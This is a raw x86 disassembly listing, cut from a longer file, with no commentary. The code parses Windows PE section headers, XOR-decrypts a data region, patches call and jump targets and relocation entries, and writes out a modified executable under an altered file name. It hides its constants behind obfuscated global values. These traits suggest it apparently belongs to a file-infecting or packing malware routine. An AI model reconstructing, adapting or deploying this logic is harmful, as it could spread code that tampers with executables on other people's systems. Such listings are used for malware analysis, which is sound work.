mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [esi+8]
mov [eax+50h], edx
call dword ptr ds:10011BACh
mov edi, ds:10012118h
movsx edx, word ptr ds:10012180h
add edi, edx
sub edi, 6
mov ecx, 0FDh
cdq
idiv ecx
add edi, edx
mov [ebp+var_1064], edi
mov eax, ds:100121C8h
sub eax, 2
mov edx, [ebp+var_42C]
mov ecx, edi
xor ecx, 4Dh
mov [edx+eax], cl
mov edi, ds:100121CCh
sub edi, 3
mov ecx, [ebp+arg_8]
shr ecx, 9
mov [edx+edi], cl
call dword ptr ds:10011BACh
mov edi, [ebp+var_84C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F28], edx
mov [ebp+var_31F24], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F28]
mov [ecx+edi], dl
call dword ptr ds:10011BACh
mov edx, ds:100121B4h
movsx ecx, word ptr ds:10012114h
add edx, ecx
sub edx, 2
add edi, edx
mov edx, [ebp+var_42C]
mov [ebp+var_31F30], edx
mov [ebp+var_31F2C], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F30]
mov [ecx+edi], dl
mov eax, ds:1001215Ch
add eax, 37h
add eax, ds:10012144h
mov [ebp+var_43C], eax
jmp short loc_41D0CC
; ---------------------------------------------------------------------------
loc_41D097: ; CODE XREF: sub_41C797+941�j
call dword ptr ds:10011BACh
mov edi, [ebp+var_43C]
mov edx, [ebp+var_42C]
mov [ebp+var_31F38], edx
mov [ebp+var_31F34], eax
mov ecx, 0FFh
cdq
idiv ecx
mov ecx, [ebp+var_31F38]
mov [ecx+edi], dl
inc [ebp+var_43C]
loc_41D0CC: ; CODE XREF: sub_41C797+8FE�j
mov eax, [ebp+var_84C]
cmp [ebp+var_43C], eax
jb short loc_41D097
push 0Dh
push 10012200h
lea eax, [ebp+var_31ED0]
push eax
call dword ptr ds:10010634h
mov eax, [esi+10h]
add eax, 0Dh
push eax
lea eax, [ebp+var_31ED0]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10010634h
add esp, 18h
mov eax, [esi+14h]
add eax, 0Dh
mov [ebp+var_1068], eax
mov edx, ds:1001211Ch
add edx, ds:100120E4h
sub edx, 3
add eax, edx
mov [ebp+var_424], eax
jmp short loc_41D14B
; ---------------------------------------------------------------------------
loc_41D131: ; CODE XREF: sub_41C797+9C3�j
mov eax, [ebp+var_424]
add eax, [ebp+var_4]
movzx edx, byte ptr [eax]
xor edx, [ebp+var_1064]
mov [eax], dl
inc [ebp+var_424]
loc_41D14B: ; CODE XREF: sub_41C797+998�j
mov eax, [ebp+var_1068]
add eax, [ebp+arg_8]
cmp [ebp+var_424], eax
jb short loc_41D131
movsx eax, word ptr ds:10012148h
add eax, ds:100121B8h
sub eax, 6
mov [ebp+var_18], eax
mov eax, ds:10012164h
mov [ebp+var_440], eax
jmp loc_41D3D0
; ---------------------------------------------------------------------------
loc_41D17F: ; CODE XREF: sub_41C797+C49�j
mov eax, 28h
mul [ebp+var_440]
mov [ebp+var_31F40], eax
mov eax, [ebp+var_84C]
mov edx, [ebp+var_42C]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F40]
mov ebx, edx
add ebx, eax
mov eax, 28h
mov ecx, [ebp+var_8]
movzx ecx, word ptr [ecx+6]
mul ecx
mov [ebp+var_31F44], eax
mov eax, [ebp+var_840]
mov edx, [ebp+var_4]
lea eax, [eax+edx+0F8h]
mov edx, [ebp+var_31F44]
mov esi, edx
add esi, eax
mov eax, ds:1001211Ch
add eax, ds:100121B4h
sub eax, 4
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_41D228
mov eax, ds:100121CCh
movsx edx, word ptr ds:10012150h
add eax, edx
sub eax, 8
cmp byte ptr [ebx+eax], 72h
jnz short loc_41D228
mov eax, ds:10012174h
add eax, ds:100121B0h
sub eax, 4
cmp byte ptr [ebx+eax], 63h
jnz short loc_41D228
mov eax, [ebx+14h]
mov [ebp+var_1178], eax
jmp loc_41D3CA
; ---------------------------------------------------------------------------
loc_41D228: ; CODE XREF: sub_41C797+A56�j
; sub_41C797+A6D�j ...
movsx eax, word ptr ds:100121A8h
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_41D26F
mov eax, ds:10012104h
sub eax, 2
cmp byte ptr [ebx+eax], 65h
jnz short loc_41D26F
mov eax, ds:100121ACh
inc eax
movsx edx, word ptr ds:100120D0h
add eax, edx
cmp byte ptr [ebx+eax], 61h
jnz short loc_41D26F
mov eax, [ebx+14h]
mov [ebp+var_117C], eax
mov eax, [ebx+0Ch]
mov [ebp+var_1180], eax
jmp loc_41D3CA
; ---------------------------------------------------------------------------
loc_41D26F: ; CODE XREF: sub_41C797+A9C�j
; sub_41C797+AAA�j ...
mov eax, ds:10012140h
add eax, ds:100120B8h
sub eax, 0Ch
cmp byte ptr [ebx+eax], 2Eh
jnz short loc_41D2AB
movsx eax, word ptr ds:100120D8h
add eax, ds:100121B0h
sub eax, 4
cmp byte ptr [ebx+eax], 69h
jnz short loc_41D2AB
mov eax, ds:100120D4h
add eax, 4
cmp byte ptr [ebx+eax], 61h
jz loc_41D3CA
loc_41D2AB: ; CODE XREF: sub_41C797+AEA�j
; sub_41C797+B00�j
push ebx
push esi
call dword ptr ds:1000E1F4h
mov eax, [ebx+8]
mov [esi+8], eax
mov eax, [ebp+var_20]
mov [esi+0Ch], eax
mov eax, [ebx+10h]
mov [esi+10h], eax
mov eax, [ebp+var_10]
mov [esi+14h], eax
mov eax, [ebx+24h]
mov [esi+24h], eax
mov eax, ds:100120F0h
inc eax
add eax, ds:1001210Ch
push eax
mov eax, ds:1001211Ch
sub eax, 3
push eax
mov eax, esi
add eax, 18h
push eax
call dword ptr ds:10010640h
mov edi, [ebp+var_18]
mov edx, [ebx+0Ch]
mov [ebp+edi*4+var_420], edx
mov edx, [ebx+8]
mov [ebp+edi*4+var_83C], edx
mov edx, [esi+0Ch]
mov [ebp+edi*4+var_C4C], edx
mov edx, [esi+14h]
mov [ebp+edi*4+var_1050], edx
inc [ebp+var_18]
mov eax, [ebx+10h]
add [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_31F3C], eax
mov eax, [ebp+var_8]
push dword ptr [eax+3Ch]
push [ebp+var_10]
call sub_41E1DA
add esp, 1Ch
mov [ebp+var_10], eax
mov eax, ds:100120F0h
add eax, ds:100121C8h
sub eax, 5
cmp byte ptr [ebx+eax], 64h
jnz short loc_41D378
mov eax, [ebp+var_31F3C]
cmp [ebp+var_10], eax
jbe short loc_41D378
mov ecx, [ebp+var_10]
sub ecx, eax
mov [ebp+var_31F48], ecx
mov eax, ecx
add [esi+8], eax
mov eax, ecx
add [esi+10h], eax
loc_41D378: ; CODE XREF: sub_41C797+BBF�j
; sub_41C797+BCA�j
mov eax, ds:10012158h
add eax, 0FFAh
add eax, ds:1001217Ch
push eax
mov eax, [ebp+var_20]
add eax, [ebx+8]
push eax
call sub_41E1DA
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
add eax, 6
inc word ptr [eax]
mov eax, [ebp+var_8]
mov edx, [esi+0Ch]
add edx, [ebx+8]
mov [eax+50h], edx
push dword ptr [esi+10h]
mov eax, [ebx+14h]
add eax, [ebp+var_42C]
push eax
mov eax, [esi+14h]
add eax, [ebp+var_4]
push eax
call dword ptr ds:10010634h
add esp, 14h
loc_41D3CA: ; CODE XREF: sub_41C797+A8C�j
; sub_41C797+AD3�j ...
inc [ebp+var_440]
loc_41D3D0: ; CODE XREF: sub_41C797+9E3�j
mov eax, [ebp+var_844]
movzx eax, word ptr [eax+6]
cmp [ebp+var_440], eax
jb loc_41D17F
mov eax, [ebp+var_1178]
add eax, [ebp+var_42C]
mov [ebp+var_14], eax
loc_41D3F5: ; CODE XREF: sub_41C797+E9B�j
mov eax, ds:1001212Ch
movsx edx, word ptr ds:10012180h
add eax, edx
sub eax, 0Bh
mov [ebp+var_1C], eax
jmp short loc_41D467
; ---------------------------------------------------------------------------
loc_41D40B: ; CODE XREF: sub_41C797+CD6�j
mov edi, [ebp+var_1C]
mov edx, [ebp+var_14]
mov edx, [edx]
cmp [ebp+edi*4+var_420], edx
jnz short loc_41D427
mov eax, [ebp+var_14]
mov eax, [eax]
mov [ebp+var_C50], eax
loc_41D427: ; CODE XREF: sub_41C797+C83�j
mov edi, [ebp+var_1C]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
mov edi, [ebp+var_14]
cmp edx, [edi]
jbe short loc_41D464
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_1050]
mov [ebp+var_106C], edi
mov edi, [ebp+var_1C]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1054], edi
jmp short loc_41D46F
; ---------------------------------------------------------------------------
loc_41D464: ; CODE XREF: sub_41C797+CA9�j
inc [ebp+var_1C]
loc_41D467: ; CODE XREF: sub_41C797+C72�j
mov eax, [ebp+var_18]
cmp [ebp+var_1C], eax
jb short loc_41D40B
loc_41D46F: ; CODE XREF: sub_41C797+CCB�j
movsx eax, word ptr ds:10012180h
add eax, ds:10012138h
sub eax, 0Eh
mov [ebp+var_428], eax
jmp loc_41D5F8
; ---------------------------------------------------------------------------
loc_41D48A: ; CODE XREF: sub_41C797+E6D�j
mov eax, [ebp+var_428]
movsx edx, word ptr ds:10012090h
add edx, 7
add eax, edx
add eax, [ebp+var_14]
mov [ebp+var_31F40], eax
mov ax, [eax]
mov word ptr [ebp+var_31F3C], ax
movzx eax, word ptr [ebp+var_31F3C]
mov edx, ds:100120A0h
sub edx, 4
cmp eax, edx
jz loc_41D60A
movzx edi, word ptr [ebp+var_31F3C]
mov ecx, ds:10012198h
add ecx, 4
sar edi, cl
mov word ptr [ebp+var_31F44+2], di
movzx edi, word ptr [ebp+var_31F3C]
mov edx, ds:100121CCh
add edx, ds:10012104h
mov ecx, edx
sub ecx, 3
shl edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx edi, word ptr [ebp+var_31F3C+2]
mov ecx, ds:10012098h
sub ecx, 3
sar edi, cl
mov word ptr [ebp+var_31F3C+2], di
movzx eax, word ptr [ebp+var_31F3C+2]
mov edx, ds:1001210Ch
add edx, ds:10012164h
sub edx, 7
cmp eax, edx
jnz short loc_41D550
movsx eax, word ptr ds:10012100h
add eax, ds:10012104h
sub eax, 0Ch
cmp [ebp+var_428], eax
jnz loc_41D60A
loc_41D550: ; CODE XREF: sub_41C797+D9B�j
mov eax, [ebp+var_844]
mov eax, [eax+34h]
mov edx, [ebp+var_14]
add eax, [edx]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F48], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1054]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
mov [ebp+var_31F4C], eax
sub eax, [ebp+var_31F48]
mov [ebp+var_31F50], eax
movzx eax, word ptr [ebp+var_31F44+2]
mov edx, ds:10012098h
add edx, ds:1001218Ch
sub edx, 5
cmp eax, edx
jnz short loc_41D5E4
mov eax, [ebp+var_106C]
mov edx, [ebp+var_14]
add eax, [edx]
sub eax, [ebp+var_C50]
movzx edx, word ptr [ebp+var_31F3C+2]
add eax, edx
add eax, [ebp+var_4]
mov [ebp+var_31F54], eax
mov edx, [ebp+var_31F50]
add [eax], edx
loc_41D5E4: ; CODE XREF: sub_41C797+E20�j
mov eax, ds:1001217Ch
add eax, ds:100120C4h
sub eax, 8
add [ebp+var_428], eax
loc_41D5F8: ; CODE XREF: sub_41C797+CEE�j
mov eax, [ebp+var_14]
mov eax, [eax+4]
cmp [ebp+var_428], eax
jb loc_41D48A
loc_41D60A: ; CODE XREF: sub_41C797+D2A�j
; sub_41C797+DB3�j
mov eax, [ebp+var_14]
mov edx, [eax+4]
add edx, eax
mov [ebp+var_14], edx
mov eax, [ebp+var_844]
mov eax, [eax+0A4h]
mov edx, [ebp+var_1178]
add edx, [ebp+var_42C]
add eax, edx
cmp [ebp+var_14], eax
jb loc_41D3F5
mov eax, [ebp+var_8]
mov ecx, [eax+28h]
mov [ebp+var_1184], ecx
mov edx, [ebp+var_1060]
mov [eax+28h], edx
add eax, 60h
mov edx, [ebp+var_844]
mov edx, [edx+60h]
add [eax], edx
mov eax, [ebp+var_8]
add eax, 68h
mov edx, [ebp+var_844]
mov edx, [edx+68h]
add [eax], edx
mov eax, [ebp+var_8]
movsx edx, word ptr ds:100120B0h
mov ecx, ds:10012120h
lea edx, [edx+ecx+3]
mov [eax+44h], dx
movsx edx, word ptr ds:10012110h
mov ecx, ds:100120ACh
lea edx, [edx+ecx+1]
mov [eax+1Ah], dl
movsx eax, word ptr ds:10012110h
mov edx, [ebp+var_8]
mov ecx, eax
add ecx, eax
mov eax, ecx
sub eax, 7
mov [edx+46h], ax
mov eax, [ebp+var_117C]
add eax, [ebp+var_42C]
mov [ebp+var_31EDC], eax
mov eax, [ebp+var_117C]
mov edx, [ebp+var_31EDC]
add eax, [edx+1Ch]
sub eax, [ebp+var_1180]
mov [ebp+var_31EE0], eax
add eax, [ebp+var_42C]
mov [ebp+var_31EE4], eax
mov eax, [eax]
mov [ebp+var_1058], eax
movsx eax, word ptr ds:10012100h
add eax, ds:100120C0h
sub eax, 0Ah
mov [ebp+var_24], eax
jmp short loc_41D746
; ---------------------------------------------------------------------------
loc_41D705: ; CODE XREF: sub_41C797+FB5�j
mov edi, [ebp+var_24]
shl edi, 2
mov edx, [ebp+edi+var_420]
add edx, [ebp+edi+var_83C]
cmp edx, [ebp+var_1058]
jbe short loc_41D743
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_420]
mov [ebp+var_1188], edi
mov edi, [ebp+var_24]
mov edi, [ebp+edi*4+var_C4C]
mov [ebp+var_1190], edi
jmp short loc_41D74E
; ---------------------------------------------------------------------------
loc_41D743: ; CODE XREF: sub_41C797+F88�j
inc [ebp+var_24]
loc_41D746: ; CODE XREF: sub_41C797+F6C�j
mov eax, [ebp+var_18]
cmp [ebp+var_24], eax
jb short loc_41D705
loc_41D74E: ; CODE XREF: sub_41C797+FAA�j
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1190]
add eax, [ebp+var_1058]
sub eax, [ebp+var_1188]
mov [ebp+var_118C], eax
mov eax, [ebp+var_844]
mov eax, [eax+34h]
add eax, [ebp+var_1058]
mov [ebp+var_1058], eax
mov eax, [ebp+var_850]
mov [ebp+var_C], eax
jmp loc_41DA05
; ---------------------------------------------------------------------------
loc_41D78F: ; CODE XREF: sub_41C797+127A�j
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
mov [ebp+var_31F3C], edx
mov ecx, ds:100120F8h
movzx edi, byte ptr [edx+eax]
movsx edx, word ptr ds:10012150h
lea edx, [edx+ecx+0E2h]
cmp edi, edx
jnz loc_41D8DA
mov edx, ds:10012188h
add edx, ds:100120C0h
mov edi, eax
add edi, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+edi]
movsx edi, word ptr ds:100120D0h
add edi, ds:100121B0h
cmp edx, edi
jnz loc_41D8DA
mov edx, eax
add edx, ecx
mov ecx, [ebp+var_31F3C]
movzx edx, byte ptr [ecx+edx]
movsx ecx, word ptr ds:10012168h
movsx edi, word ptr ds:100120F4h
add ecx, edi
sub ecx, 11h
cmp edx, ecx
jnz loc_41D8DA
mov edx, ds:100121B4h
add edx, 2
mov ecx, eax
add ecx, edx
mov edx, [ebp+var_31F3C]
movzx edx, byte ptr [edx+ecx]
cmp edx, ds:10012108h
jnz loc_41D8DA
mov edx, ds:100121ACh
add edx, ds:100121A0h
sub edx, 6
add eax, edx
mov edx, [ebp+var_31F3C]
movzx eax, byte ptr [edx+eax]
movsx edx, word ptr ds:10012114h
movsx ecx, word ptr ds:10012154h
add edx, ecx
sub edx, 0Ah
cmp eax, edx
jnz short loc_41D8DA
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1184]
mov [ebp+var_31F44], eax
mov eax, ds:10012130h
add eax, 0FFFFFFFFh
sub eax, [ebp+var_31F40]
add eax, [ebp+var_31F44]
movsx edx, word ptr ds:100120D0h
add edx, 4
sub eax, edx
mov [ebp+var_31F48], eax
mov edi, ds:1001217Ch
mov edx, [ebp+var_C]
mov ecx, ds:100120C4h
sub ecx, 3
add edx, ecx
add edx, [ebp+var_4]
mov ecx, eax
mov [edx+edi*4-18h], ecx
loc_41D8DA: ; CODE XREF: sub_41C797+101E�j
; sub_41C797+104D�j ...
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
movzx ecx, byte ptr [edx+eax]
mov edi, ds:100121A4h
add edi, 0E0h
add edi, ds:100120B4h
cmp ecx, edi
jnz loc_41DA02
mov ecx, ds:1001210Ch
sub ecx, 6
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
mov edi, ds:10012140h
sub edi, 8
cmp ecx, edi
jnz loc_41DA02
movsx ecx, word ptr ds:10012110h
sub ecx, 2
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word ptr ds:100121A8h
cmp ecx, edi
jnz loc_41DA02
movsx ecx, word ptr ds:10012128h
add ecx, 3
mov edi, eax
add edi, ecx
movzx ecx, byte ptr [edx+edi]
movsx edi, word ptr ds:100120B0h
sub edi, 8
cmp ecx, edi
jnz loc_41DA02
add eax, ds:100120B8h
movzx eax, byte ptr [edx+eax]
mov edx, ds:10012144h
sub edx, 5
cmp eax, edx
jnz loc_41DA02
mov eax, [ebp+var_8]
mov eax, [eax+34h]
add eax, [ebp+var_1060]
mov edx, [ebp+var_C]
sub edx, [ebp+var_850]
add eax, edx
mov [ebp+var_31F40], eax
mov eax, [ebp+var_118C]
mov [ebp+var_31F44], eax
mov eax, ds:100120F0h
add eax, 0FFFFFFFBh
sub eax, [ebp+var_31F40]
add eax, [ebp+var_31F44]
movsx edx, word ptr ds:100120B0h
sub edx, 4
sub eax, edx
mov [ebp+var_31F48], eax
mov edi, ds:10012098h
movsx edx, word ptr ds:1001219Ch
mov ecx, edi
add ecx, edx
mov edx, [ebp+var_C]
movsx eax, word ptr ds:100121BCh
add eax, edi
mov edi, eax
sub edi, 0Ch
add edx, edi
mov edi, edx
add edi, [ebp+var_4]
mov edx, [ebp+var_31F48]
mov [edi+ecx*4-34h], edx
loc_41DA02: ; CODE XREF: sub_41C797+1161�j
; sub_41C797+1183�j ...
inc [ebp+var_C]
loc_41DA05: ; CODE XREF: sub_41C797+FF3�j
mov eax, [ebp+var_850]
add eax, 0Dh
cmp [ebp+var_C], eax
jb loc_41D78F
push [ebp+var_1070]
call dword ptr ds:10010650h
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000E1F4h
add esp, 8
lea ecx, [ebp+var_116F]
or eax, 0FFFFFFFFh
loc_41DA3F: ; CODE XREF: sub_41C797+12AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DA3F
mov [ebp+var_31ED4], eax
mov edx, ds:10012198h
add edx, ds:10012158h
sub edx, 5
sub eax, edx
mov [ebp+eax+var_116F], 69h
mov eax, [ebp+var_31ED4]
mov edx, ds:100120C0h
movsx ecx, word ptr ds:10012180h
add edx, ecx
sub edx, 5
sub eax, edx
mov [ebp+eax+var_116F], 76h
mov eax, [ebp+var_31ED4]
mov edx, ds:10012140h
sub edx, 7
sub eax, edx
mov [ebp+eax+var_116F], 72h
push 0
mov eax, ds:10012098h
movsx edx, word ptr ds:10012128h
add eax, edx
sub eax, 7
push eax
push 2
push 0
mov eax, ds:1001218Ch
add eax, ds:100121B0h
sub eax, 1
push eax
push 40000000h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:10011788h
mov [ebp+var_1070], eax
push 0
lea eax, [ebp+var_31ED8]
push eax
push [ebp+var_10]
push [ebp+var_4]
push [ebp+var_1070]
call dword ptr ds:10011B8Ch
push [ebp+var_1070]
call dword ptr ds:10010650h
push [ebp+var_4]
call dword ptr ds:1000E618h
push 0
push [ebp+arg_0]
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000F364h
lea eax, [ebp+var_116F]
push eax
call dword ptr ds:1000C008h
mov eax, 1
jmp short loc_41DB4C
; ---------------------------------------------------------------------------
loc_41DB35: ; CODE XREF: sub_41C797+BA�j
; sub_41C797+D4�j ...
push [ebp+var_1070]
call dword ptr ds:10010650h
push [ebp+var_4]
call dword ptr ds:1000E618h
xor eax, eax
loc_41DB4C: ; CODE XREF: sub_41C797+56�j
; sub_41C797+139C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C797 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DB51 proc near ; CODE XREF: sub_41BB8D+197�p
; sub_41BB8D+23B�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
and [ebp+var_8], 0
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41DB66: ; CODE XREF: sub_41DB51+1A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DB66
mov [ebp+var_C], eax
mov eax, [ebp+arg_4]
lea ecx, [eax]
or eax, 0FFFFFFFFh
loc_41DB78: ; CODE XREF: sub_41DB51+2C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41DB78
mov esi, eax
mov eax, ds:10012104h
add eax, ds:10012164h
sub eax, 3
mov [ebp+var_4], eax
jmp short loc_41DBEC
; ---------------------------------------------------------------------------
loc_41DB94: ; CODE XREF: sub_41DB51+A1�j
movsx eax, word ptr ds:1001219Ch
mov ebx, eax
add ebx, ds:10012160h
sub ebx, 0Eh
mov eax, ds:1001210Ch
mov edi, eax
add edi, ds:100120A0h
sub edi, 0Bh
jmp short loc_41DBE5
; ---------------------------------------------------------------------------
loc_41DBB8: ; CODE XREF: sub_41DB51+96�j
mov eax, [ebp+var_4]
add eax, edi
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx+eax]
mov edx, [ebp+arg_4]
movsx edx, byte ptr [edx+edi]
cmp eax, edx
jnz short loc_41DBE9
inc ebx
cmp ebx, esi
jnz short loc_41DBE4
inc [ebp+var_8]
mov eax, [ebp+arg_8]
cmp [ebp+var_8], eax
jnz short loc_41DBE4
mov eax, [ebp+var_4]
jmp short loc_41DBF9
; ---------------------------------------------------------------------------
loc_41DBE4: ; CODE XREF: sub_41DB51+81�j
; sub_41DB51+8C�j
inc edi
loc_41DBE5: ; CODE XREF: sub_41DB51+65�j
cmp edi, esi
jb short loc_41DBB8
loc_41DBE9: ; CODE XREF: sub_41DB51+7C�j
inc [ebp+var_4]
loc_41DBEC: ; CODE XREF: sub_41DB51+41�j
mov eax, [ebp+var_C]
cmp [ebp+var_4], eax
jb short loc_41DB94
mov eax, 0FFFFh
loc_41DBF9: ; CODE XREF: sub_41DB51+91�j
pop edi
pop esi
pop ebx
leave
retn
sub_41DB51 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DBFE proc near ; CODE XREF: sub_42149B+441�p
; sub_42149B+452�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_424F4D
push esi
push edi
push 5
push [ebp+arg_0]
call dword ptr ds:1000C004h
mov edi, eax
loc_41DC1A: ; CODE XREF: sub_41DBFE+7D�j
or edi, edi
jnz short loc_41DC22
xor eax, eax
jmp short loc_41DC7D
; ---------------------------------------------------------------------------
loc_41DC22: ; CODE XREF: sub_41DBFE+1E�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call dword ptr ds:1000D010h
mov eax, ds:100121C4h
add eax, ds:100120B8h
sub eax, 8
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_41DB51
add esp, 0Ch
mov esi, ds:100121B4h
add esi, 0FFFEh
add esi, ds:10012164h
cmp eax, esi
jz short loc_41DC70
mov eax, edi
jmp short loc_41DC7D
; ---------------------------------------------------------------------------
loc_41DC70: ; CODE XREF: sub_41DBFE+6C�j
push 2
push edi
call dword ptr ds:1000C004h
mov edi, eax
jmp short loc_41DC1A
; ---------------------------------------------------------------------------
loc_41DC7D: ; CODE XREF: sub_41DBFE+22�j
; sub_41DBFE+70�j
pop edi
pop esi
leave
retn
sub_41DBFE endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
movsx eax, word ptr ds:10012128h
add eax, ds:10012174h
sub eax, 9
cmp ds:1000E604h, eax
jbe short loc_41DCA7
push 1000E604h
call dword ptr ds:1000C010h
loc_41DCA7: ; CODE XREF: .data:0041DC9A�j
mov eax, ds:1000E604h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DCB0 proc near ; CODE XREF: sub_41C561+BB�p
; sub_41E9E2+1C3�p ...
var_EF38 = dword ptr -0EF38h
var_EF34 = dword ptr -0EF34h
var_EF30 = dword ptr -0EF30h
var_EF2C = byte ptr -0EF2Ch
var_EF2B = byte ptr -0EF2Bh
var_EE2C = dword ptr -0EE2Ch
var_EE24 = byte ptr -0EE24h
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
mov eax, 0EF38h
call sub_424F4D
push ebx
push esi
push edi
movsx edi, word ptr ds:10012170h
imul esi, ds:10012130h, 3C0h
lea edi, [edi+edi+0EA50h]
lea edi, [esi+edi+780h]
shl edi, 1
mov [ebp+var_EF38], edi
push edi
call sub_424ED2
add esp, 4
mov [ebp+var_EE2C], eax
movzx eax, [ebp+arg_0]
mov edx, ds:100120ECh
sub edx, 4
cmp eax, edx
jnz short loc_41DD2A
push 100135C4h
call sub_4228CE
add esp, 4
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10011634h
add esp, 8
jmp loc_41DE17
; ---------------------------------------------------------------------------
loc_41DD2A: ; CODE XREF: sub_41DCB0+55�j
call dword ptr ds:1000F228h
mov ebx, eax
mov [ebp+var_EF2C], bl
movzx eax, [ebp+arg_0]
mov edx, ds:10012138h
add edx, ds:100120C0h
sub edx, 7
cmp eax, edx
jnz short loc_41DD9E
mov eax, ds:100120E4h
add eax, 5
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push [ebp+arg_8]
call sub_41C34A
add esp, 0Ch
push 10013594h
call sub_4228CE
add esp, 4
movzx edi, [ebp+var_EF2C]
push edi
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10011634h
add esp, 10h
jmp short loc_41DE17
; ---------------------------------------------------------------------------
loc_41DD9E: ; CODE XREF: sub_41DCB0+9D�j
mov eax, ds:10012160h
sub eax, 8
and eax, 0FFh
push eax
lea eax, [ebp+var_EF2B]
push eax
push dword ptr ds:100122B0h
call sub_41C34A
add esp, 0Ch
push 10013536h
call sub_4228CE
add esp, 4
mov edi, [ebp+arg_18]
mov esi, [ebp+arg_8]
mov ebx, edi
add ebx, esi
push ebx
push [ebp+arg_1C]
push edi
push [ebp+arg_14]
movzx edi, [ebp+var_EF2C]
push edi
mov edi, esi
sub edi, [ebp+arg_C]
sub edi, ds:100120C4h
push edi
push 1000F230h
push [ebp+arg_10]
push [ebp+arg_20]
lea edi, [ebp+var_EF2B]
push edi
push eax
lea edi, [ebp+var_EE24]
push edi
call dword ptr ds:10011634h
add esp, 30h
loc_41DE17: ; CODE XREF: sub_41DCB0+75�j
; sub_41DCB0+EC�j
push [ebp+var_EF38]
push [ebp+var_EE2C]
movsx eax, word ptr ds:10012128h
inc eax
neg eax
push eax
lea eax, [ebp+var_EE24]
push eax
mov eax, ds:100120C4h
movsx edx, word ptr ds:1001216Ch
add eax, edx
sub eax, 8
push eax
push 0
call dword ptr ds:1001163Ch
push 1001351Ch
call sub_41F3E4
add esp, 4
push eax
call dword ptr ds:1000C044h
mov [ebp+var_EF30], eax
push [ebp+var_EE2C]
call dword ptr ds:1000C044h
mov [ebp+var_EF34], eax
push eax
push [ebp+var_EF30]
mov eax, [ebp+arg_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+104h]
push [ebp+var_EF34]
call dword ptr ds:10011BA0h
push [ebp+var_EF30]
call dword ptr ds:10011BA0h
lea esp, [ebp-0EF44h]
pop edi
pop esi
pop ebx
leave
retn
sub_41DCB0 endp
; ---------------------------------------------------------------------------
db 0B8h, 1, 40h
dd 10C28000h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DEB9 proc near ; CODE XREF: sub_41DEB9+27E�p
; sub_41DEB9+2E6�p ...
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
